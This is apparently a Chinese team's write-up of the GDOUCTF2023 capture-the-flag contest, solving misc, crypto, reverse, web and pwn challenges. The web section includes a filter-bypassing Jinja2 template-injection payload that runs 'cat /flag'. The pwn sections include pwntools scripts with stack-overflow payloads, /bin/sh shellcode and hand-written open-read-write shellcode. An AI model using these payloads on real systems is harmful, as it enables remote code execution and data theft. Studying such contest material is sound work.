GDOUCTF2023 WriteUP by 肥猪拱菜队
2024-05-11 04:49:03
前言
本篇WriteUP为B@0、ccc、Boogipop、树木共同编写,感谢三位师傅带我打比赛拿了个第五Orz
Misc
签到
关注微信公众号发送指令得到flag
Matryoshka
解压附件得到一个zip和一个txt,看看txt的内容
不难发现,是将数字和一些运算符号给用英文替换了,我们手动计算一下,但是解压发现并不是密码,我开始怀疑是不是思路错了,然而。。。
队友说是直接从左往右算,而不是先乘除后加减,所以不能用eval,这里自己造个轮子打一打
import re, zipfiledef replace_words(line):line = line.replace("one", "1")line = line.replace("two", "2")line = line.replace("three", "3")line = line.replace("four", "4")line = line.replace("five", "5")line = line.replace("six", "6")line = line.replace("seven", "7")line = line.replace("eight", "8")line = line.replace("nine", "9")line = line.replace("zero", "0")line = line.replace("plus", "+")line = line.replace("minus", "-")line = line.replace("times", "*")line = line.replace("divided", "/")line = line.replace("mod", "%")return linedef eval_line(line):tokens = re.findall(r"\d+|[\+\-\*/%]", line)result = int(tokens[0])i = 1while i < len(tokens):if tokens[i] == '+':result += int(tokens[i + 1])elif tokens[i] == '-':result -= int(tokens[i + 1])elif tokens[i] == '*':result *= int(tokens[i + 1])elif tokens[i] == '/':result /= int(tokens[i + 1])elif tokens[i] == '%':result %= int(tokens[i + 1])i += 2return int(result)number = 1000while(number > 1):with open("password"+str(number)+".txt") as f:password = f.read()password = replace_words(password)print(password)result = eval_line(password)print(result)with zipfile.ZipFile("Matryoshka"+str(number)+".zip") as my_zip:my_zip.extractall(pwd=str(result).encode())number = number - 1print(number)然后脚本挂着挂着寄了
还以为是模运算优先级问题,跟chatgpt扯皮半天,结果我的队友发现密码不要负数,让我试试绝对值,那我就加上绝对值试试
while(number > -1):with open("password"+str(number)+".txt") as f:password = f.read()password = replace_words(password)print(password)result = abs(eval_line(password))print(result)with zipfile.ZipFile("Matryoshka"+str(number)+".zip") as my_zip:my_zip.extractall(pwd=str(result).encode())number = number - 1print(number)你别说,你还真别说,真就是那个绝对值的问题,加上abs后完美解决,成功拿到flag
NSSCTF{4u70m473_3v3ry7h1n6}pixelart
拿到附件,看到很像flag的东西
直接肉眼OCR,读半天读了个fake的flag,气死我了!!!
再继续尝试,发现美腿部分也有一部分像素点,用PS读一下RGB,然后PIL造个轮子提一下
def image_read(image_path: str, logger: logging.Logger) -> tuple:"""将输入的图像文件(文件路径)进行读取,并逐行扫描后,将像素数据写入列表对象并返回Args:image_path (str): 图像文件的路径Returns:tuple: (X_image:int, Y_image:int, img_pixels:list, img_data_image:Image)X_image (int): 图像文件的路径Y_image (int): 二进制数据的处理顺序img_pixels (int): 图像的像素数据img_data_image (Image): 图像对象"""img_data_image = Image.open(image_path)img_data_image.convert("RGBA")X_image, Y_image = img_data_image.sizeimg_pixels = []for y in range(Y_image):for x in range(X_image):img_pixels.append(img_data_image.getpixel((x, y)))return X_image, Y_image, img_pixels, img_data_image调用轮子,提取所有像素点
from images import imagesimport loggingfrom PIL import Imagelogger = logging.getLogger("zeus-log")logger.setLevel(logging.DEBUG)if __name__ == "__main__":X, Y, img, im = images.image_read("./arcaea.png", logger)imm = Image.new("RGB", (320, 180))m, n = 0, 0for i in range(0, Y, 12):for j in range(0, X, 12):pixel = img[i*X+j]imm.putpixel((m, n), pixel)m += 1n += 1m = 0imm.show()得到一张非常哇塞的图片,但是没有flag
zsteg跑一下,这次有flag了捏
NSSCTF{J3st_2_cats_battling}Crypto
Absolute_Baby_Encrytpion
签到题,单表替换密码,表都给了,费点功夫逆个表
encryptedString = input("Enter an encrypted string: ")charArray = list(encryptedString)decryptedString = ""hasInvalidCharacter = Falsefor char in charArray:if char == '!':decryptedString += 'a'elif char == '1':decryptedString += 'b'elif char == ')':decryptedString += 'c'elif char == 'v':decryptedString += 'd'elif char == 'm':decryptedString += 'e'elif char == '+':decryptedString += 'f'elif char == 'q':decryptedString += 'g'elif char == '0':decryptedString += 'h'elif char == 'c':decryptedString += 'i'elif char == ']':decryptedString += 'j'elif char == '(':decryptedString += 'k'elif char == '}':decryptedString += 'l'elif char == '[':decryptedString += 'm'elif char == '8':decryptedString += 'n'elif char == '5':decryptedString += 'o'elif char == '$':decryptedString += 'p'elif char == '*':decryptedString += 'q'elif char == 'i':decryptedString += 'r'elif char == '>':decryptedString += 's'elif char == '#':decryptedString += 't'elif char == '<':decryptedString += 'u'elif char == '?':decryptedString += 'v'elif char == 'o':decryptedString += 'w'elif char == '^':decryptedString += 'x'elif char == '-':decryptedString += 'y'elif char == '_':decryptedString += 'z'elif char == 'h':decryptedString += '0'elif char == 'w':decryptedString += '1'elif char == 'e':decryptedString += '2'elif char == '9':decryptedString += '3'elif char == 'g':decryptedString += '4'elif char == 'z':decryptedString += '5'elif char == 'd':decryptedString += '6'elif char == '~':decryptedString += '7'elif char == '=':decryptedString += '8'elif char == 'x':decryptedString += '9'elif char == 'j':decryptedString += '!'elif char == ':':decryptedString += '@'elif char == '4':decryptedString += '#'elif char == 'b':decryptedString += '$'elif char == '`':decryptedString += '%'elif char == 'l':decryptedString += '^'elif char == '3':decryptedString += '&'elif char == 't':decryptedString += '*'elif char == '6':decryptedString += '('elif char == 's':decryptedString += ')'elif char == 'n':decryptedString += '_'elif char == ';':decryptedString += '+'elif char == '\'':decryptedString += '-'elif char == 'r':decryptedString += '='elif char == 'k':decryptedString += '`'elif char == 'p':decryptedString += '~'elif char == '\"':decryptedString += '{'elif char == '&':decryptedString += '}'elif char == '/':decryptedString += '['elif char == '\\':decryptedString += ']'elif char == '2':decryptedString += '|'elif char == '.':decryptedString += ':'elif char == '%':decryptedString += ';'elif char == '|':decryptedString += '\"'elif char == ',':decryptedString += '\''elif char == '@':decryptedString += '<'elif char == '{':decryptedString += '>'elif char == 'u':decryptedString += ','elif char == '7':decryptedString += '.'elif char == 'y':decryptedString += '?'elif char == 'a':decryptedString += '/'else:hasInvalidCharacter = Trueif hasInvalidCharacter:decryptedString = "Invalid String!"else:print(f"Your decoded string is {decryptedString}")Math Problem
根据椭圆曲线的性质,直接copper出x,然后用small_roots求p,最后常规RSA解密,搞定
from Crypto.Util.number import *import gmpy2e = 65537n = 79239019133008902130006198964639844798771408211660544649405418249108104979283858140199725213927656792578582828912684320882248828512464244641351915288069266378046829511827542801945752252863425605946379775869602719406340271702260307900825314967696531175183205977973427572862807386846990514994510850414958255877c = 45457869965165575324534408050513326739799864850578881475341543330291990558135968254698676312246850389922318827771380881195754151389802803398367341521544667542828862543407738361578535730524976113729406101764290984943061582342991118766322793847422471903811686775249409300301726906738475446634950949059180072008a = 9303981927028382051386918702900550228062240363697933771286553052631411452412621158116514735706670764224584958899184294505751247393129887316131576567242619b = 9007779281398842447745292673398186664639261529076471011805234554666556577498532370235883716552696783469143334088312327338274844469338982242193952226631913y = 970090448249525757357772770885678889252473675418473052487452323704761315577270362842929142427322075233537587085124672615901229826477368779145818623466854PR = PolynomialRing(base_ring=Zmod(n), names=('x',))x = PR.gen()f = x**3 + a*x + b - y**2f = f.monic()x0 = f.small_roots(X=2**64, beta=0.4, epsilon=0.01)[0]f = x0**3 + a*x0 + b - y**2p = gmpy2.gcd(int(f), n)q = n // pphi = (p - 1) * (q - 1)d = gmpy2.invert(e, phi)m = pow(c, d, n)print(long_to_bytes(m))babylua
拿chatgpt做的 233 虽然不是密码手 但是还是出了一题
虽然看不懂lua语言 丢给gpt分析以后知道了 主要逻辑 从大小写字母中随机抽取4个字符 经过md5加密以后 给出了前10位 这里需要第一次遍历是哪四个字符 最后得知是kKpU
爆破字符的脚本:
from hashlib import md5from itertools import productdic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'seed_list = [''.join(x) for x in product(dic, repeat=4)]for seed in seed_list:key = md5(md5(seed.encode()).hexdigest().encode()).hexdigest()[:10]if key == 'b5e62abe84':print(seed)break得到flag的脚本
from hashlib import md5key = md5(md5(b'kKpU').hexdigest().encode()).hexdigest().encode()s = '200 161 198 157 173 169 199 150 105 163 193 175 173 194 135 131 135 225'.split()for i in range(len(s)):print(chr(int(s[i]) - key[i]), end='')最后其实就是利用把s的每一位对应的key 减去就行了
Web
hate eat snake
改前端JS.
受不了一点
我也一点都受不了这题目,无语,你自己品
POST /?aaa=114514a&bbb=114514b HTTP/1.1Host: node6.anna.nssctf.cn:28329Content-Length: 31Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1Origin: http://node6.anna.nssctf.cn:28329Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://node6.anna.nssctf.cn:28329/?aaa=114514a&bbb=114514bAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7cookie: cookie=j0k3rConnection: closegdou%5B%5D=1&ctf%5B%5D=2&flag=1请求包如上,发送即可获得
EZ WEB
我会发PUT请求
<ez_ze>
随便掏了个payload
{% set coun=dict(eeeeeeeeeeeeeeeeeeeeeeee=a)|join|count%}{% set po=dict(po=a,p=a)|join%}{% set a=(()|select|string|list)|attr(po)(coun)%}{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}{% set xxx=dict(o=a,s=a)|join%}{%print(lipsum|attr(glo)|attr(a+a+'get'+'item'+a+a)(xxx)|attr('po'+'pen')('cat /flag')|attr('read')())%}x`
Pwn
EASY PWN
表面上看起来是猜测/dev/urandom中的随机数 但是实际上能否获取flag是依靠v5的值 使其为1即可获取flag
s1字符串的读入是采取gets函数 存在溢出 只需要0x1f-0x4的垃圾数据 就能够到v5
from pwn import*from struct import packfrom ctypes import *from LibcSearcher import*#io = process("./pwn")io = remote("node5.anna.nssctf.cn",28952)elf = ELF("./pwn")libc = ELF("./libc.so.6")context.log_level = "debug"context.arch = "amd64"io.recvuntil("Password:")payload = cyclic(0x1f-0x4)+p32(1)io.sendline(payload)io.recv()io.recv()Shellcode
板子题 有往bss段读入shellcode的机会 也有栈溢出 那就直接跳转就好了
from pwn import*from struct import packfrom ctypes import *from LibcSearcher import*#io = process("./pwn")io = remote("node6.anna.nssctf.cn",28966)elf = ELF("./pwn")libc = ELF("./libc.so.6")context.log_level = "debug"context.arch = "amd64"io.recvuntil("Please.")shellcode = '\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'io.send(shellcode)io.recvuntil("Let's start!")payload = cyclic(0xa+0x8)+p64(0x6010A0)io.send(payload)io.interactive()真男人下120层
考的伪随机数 虽然拿了时间当种子 但是我们脚本也可以利用时间当种子 一般不会偏差到哪里去 概率失败
虽然但是 还是要吐槽一句 伪随机数真的考烂了 我第一篇wp就是关于伪随机数的
from pwn import*from struct import packfrom ctypes import *from LibcSearcher import*#io = process("./pwn")io = remote("node5.anna.nssctf.cn",28082)elf = ELF("./pwn")#libc = ELF("./libc.so.6")libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')context.log_level = "debug"context.arch = "amd64"seed = libc.time(0)libc.srand(seed)libc.srand(libc.rand() % 3 - 1522127470)for i in range(120):io.recvuntil("\n\n")buf = libc.rand() % 4 + 1io.sendline(str(buf))io.recvuntil("Congratulation!")flag = io.recvuntil("}")print(flag)Random
手写shellcode的题 就是不理解为什么一定要塞随机数进来。。。出题人这么喜欢伪随机数吗
思路就是构造read往其他rwxp权限地址写orw 因为开启了沙盒 本来有想过不赋值rsi了 直接在栈上写 但是试了下 本地能通 远程估计因为libc版本的原因 偏移不对 失败了 耽误了点时间 痛失血
vmmap查看一下 0x601000可以用来当中转
from pwn import*from ctypes import *#io = process("./pwn")io = remote("node5.anna.nssctf.cn",28381)context.log_level = "debug"context.terminal = ['tmux','splitw','-h']elf = ELF("./test")libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")#libc = ELF("buu16_64.so")context.arch = "amd64"seed = libc.time(0)libc.srand(seed)io.recvuntil("please input a guess num:")buf = libc.rand()%50io.sendline(str(buf))io.recvuntil("your door")shellcode = """xor eax,eaxshl edx,12mov esi,0x601700syscalljmp rsi"""jmp_rsp = 0x000000000040094epayload = cyclic(0x28)+p64(jmp_rsp)+asm(shellcode)# gdb.attach(io,'b *0x400949')# pause(0)io.send(payload)shellcode = asm('''push 0x67616c66mov rdi,rspxor esi,esipush 2pop raxsyscallmov rdi,raxmov rsi,rspmov edx,0x100xor eax,eaxsyscallmov edi,1mov rsi,rsppush 1pop raxsyscall''')io.send(shellcode)flag = io.recvuntil("}")print(flag)Reverse
Check_Your_Luck
z3解题即可
from z3 import *v,w,x,y,z= Ints("v w x y z")solver = Solver()#check '76876' '77776'solver.add(v * 23 + w * -32 + x * 98 + y * 55 + z * 90 == 333322)solver.add(v * 123 + w * -322 + x * 68 + y * 67 + z * 32 == 707724)solver.add(v * 266 + w * -34 + x * 43 + y * 8 + z * 32 == 1272529)solver.add(v * 343 + w * -352 + x * 58 + y * 65 + z * 5 == 1672457)solver.add(v * 231 + w * -321 + x * 938 + y * 555 + z * 970 == 3372367)solver.check()result = solver.model()print(result)# flag{4544_123_677_1754_777}#print("flag{" + result["v"] + "_" + result["w"] + "_" + result["x"] + "_" + result["y"] + "_" + result["z"] + "}")doublegame
第一个游戏是贪吃蛇,修改分数跳过即可。第二个游戏是迷宫,迷宫又分两步,第一步走到 从@走到 * ,第二步走出去。
然后flag格式是
0000000000000000000000 0 0 0 0 0 00 0 0 00000 00000 0 00 0 0 00 000 000 0 000 0 0 00 0 0 0 0 0 0 00 0 0 00000 000 000 00 0 0 0 0 00 000 0 0 000 0 0 0 00 0 0 0 0 0 0 0 00 00000 000 000 0 0 00 0 0 0 0000 0 0 0 000 0 0 0 00 0 0 0 0 0 * 0 0 0 00 0000000 0 000 00000@ 0 0 0 00 0 0 0 0 000000000000 0 0 0 0000 0 00000 0 000 0000 0 0 0 0000000000000000000000dddssssddwwwwddssddwwwwwwddddssaassddddwwwwddwwwwddd最高分:13371337NSSCTF{5AFFF098B4E0757913371337}NSSCTF{811173B05AFFF098B4E0757962127EAC13371337}NSSCTF{811173b05afff098b4e0757962127eac13371337} //正确的NSSCTF{5afff098b4e0757913371337}NSSCTF{811173b05afff098b4e0757962127eac13371337}
Tea
xtea算法
有了key和密文解密即可
#include <stdio.h>#include <cstdint>#include <windows.h>void De(DWORD* enc, DWORD* key){int v2; // [rsp+44h] [rbp+24h]int i; // [rsp+64h] [rbp+44h]unsigned int v4; // [rsp+84h] [rbp+64h]unsigned int sum; // [rsp+C4h] [rbp+A4h]for (i = 8; i >= 0; --i){v4 = 0;sum = 0xF462900 * i + 0xF462900 * 33;v2 = i + 1;do{++v4;sum -= 0xF462900;enc[v2] -= (sum + key[(sum >> 11) & 3]) ^ (enc[i] + ((enc[i] >> 5) ^ (16 * enc[i])));enc[i] -= sum ^ (enc[v2] + ((enc[v2] >> 5) ^ (16 * enc[v2]))) ^ (sum + key[sum & 3]);} while (v4 <= 32);}}DWORD key[4] = {0x8B9, 0x1167, 0x1A15, 0x22C3};DWORD data[10] = { 0x1A800BDA, 0xF7A6219B, 0x491811D8, 0xF2013328, 0x156C365B, 0x3C6EAAD8, 0x84D4BF28, 0xF11A7EE7,0x3313B252, 0xDD9FE279 };int main() {De(data, key);for (int i = 0;i < 10;i++) {printf("0x%x ", data[i]);}return 0;}
每日emo
【天上皎皎明月光,人间匆匆少年郎,脚步最匆匆】
GDOUCTF2023 WriteUP by 肥猪拱菜队相关推荐
- GDOUCTF2023 Writeup
序 比赛的时候踩大坑了 & 还得多学啊 & 被带飞了 PWN EASY PWN 能往 s1 写入任意长 payload,覆盖下面的 v5 为一个非零的数就有 flag. exp 如下: ...
- 第十六届全国大学生智能车竞赛报名信息统计
§01 信息处理 一.信息来源 处理信息来自于8月24日 智能车竞赛网站 的报名信息导出的EXCEL表格.这是参加第16届智能车竞赛竞速组别的队伍报名信息.不包括参加"三个创意组别" ...
- 第十六届全国大学智能车竞赛华南赛区成绩汇总
简 介: 第十六届全国大学生智能车竞赛华南赛区(不包括广东省)在桂林电子科技大学举行,各组别成绩以及奖项内容在本文中给出. 关键词: 智能车竞赛,华南赛区 §01 各组成绩 一.基础四轮组 学校 队伍 ...
- 第十六届全国大学智能车竞赛创意组比赛国赛获奖名单
正式文档将会在竞赛网站公布: smartcar.cdstm.cn §01 百度智慧交通 一.东部赛区 赛区 省份 学校 队伍名称 区域赛总分 奖项 东部 山西省 太原科技大学 太科大 98.9 国一 ...
- 第十六届全国大学生智能车竞赛百度智慧交通竞赛成绩
简 介: 2021年第十六届全国大学生智能车竞赛百度智慧交通比赛成绩与获奖信息分析. 关键词: 智能车竞赛,百度智慧交通 §01 东部赛区 [表1-1 东部赛区队伍比赛成绩与获奖] 省份 学校 队伍名 ...
- 第十六届全国大学生智能汽车竞赛--百度智慧交通(东部赛区)
ENJOY AI Master选拔赛 赛事日程安排 赛事地点:上海市闵行区莘庄工业区社区文化中心(颛盛路745号). 赛事时间:2021年7月19-21日 一.日程安排 二.报到准备 1. ...
- 第三轮316工程知识竞赛简讯_【资讯】第五届日本文化知识竞赛决赛
第五届日本文化知识竞赛决赛 外国语学院第五届日本文化知识竞赛决赛于12月12日周六晚上在钟海楼02031举行. 比赛过程中惊喜不断,选手们的表现和团队合作精神令人赞叹不已,老师的精彩点评引起了我们的思 ...
- 论如何举办一个承载400人的比赛(XUPT新生赛承办小记)
XUPT新生赛承办小记 老师去年就想搞一个新生赛了,奈何去年时间不够,没有搞,于是今年就开始提前搞起来了.ZLS说要不然搞一个domjudge,我寻思着好鸭好鸭,看起来很牛逼,然后就开始了苦逼的配环境 ...
- 第十七届全国大学智能车竞赛百度智慧交通组获奖名单
01 全国总决赛奖项 一.线下比赛组别 参赛省市 队伍名称 学校名称(全称) 指导老师 指导老师 参赛队员(1) 参赛队员(2) 参赛队员(3) 参赛队员(4) 参赛队员(5) 奖项 辽宁省 A大五个 ...
最新文章
- 16个免费和开源商业智能工具
- NeurIPS审稿引发吐槽大会,落选者把荒唐意见怼了个遍:“我谢谢你们了”
- 百度智能小程序开源联盟成立,首批12家成员签约
- Kubernetes-连接Harbor仓库拉取镜像
- 安卓系统双屏异显_Android 双屏异显实现的三种方式
- mysql维护计划任务_浅谈MySQL event 计划任务
- Ping pong【树状数组】
- YOLOv3目标检测有了TensorFlow实现,可用自己的数据来训练
- FPGA 无解漏洞 “StarBleed”轰动一时,今天来扒一下技术细节!
- MySQL中 Data truncated for column ‘xxx‘解决方法
- 面试中常见智力题汇总
- win7原版镜像_i3-8100装Win7没有集显驱动?驱动人生告诉你为什么
- 内核同步机制——蜗窝科技
- 微信公众号之错误返回码
- matlab trapz二重积分函数_如何使用 MATLAB 求解定积分、不定积分和多重积分问题...
- ESP8266-Arduino编程实例-BMM150数字地磁传感器驱动
- 编程java好学吗,编程好学吗?零基础学多久能入门?
- Gurobi安装及配置
- python快速搭建本地服务器
- clickhouse多副本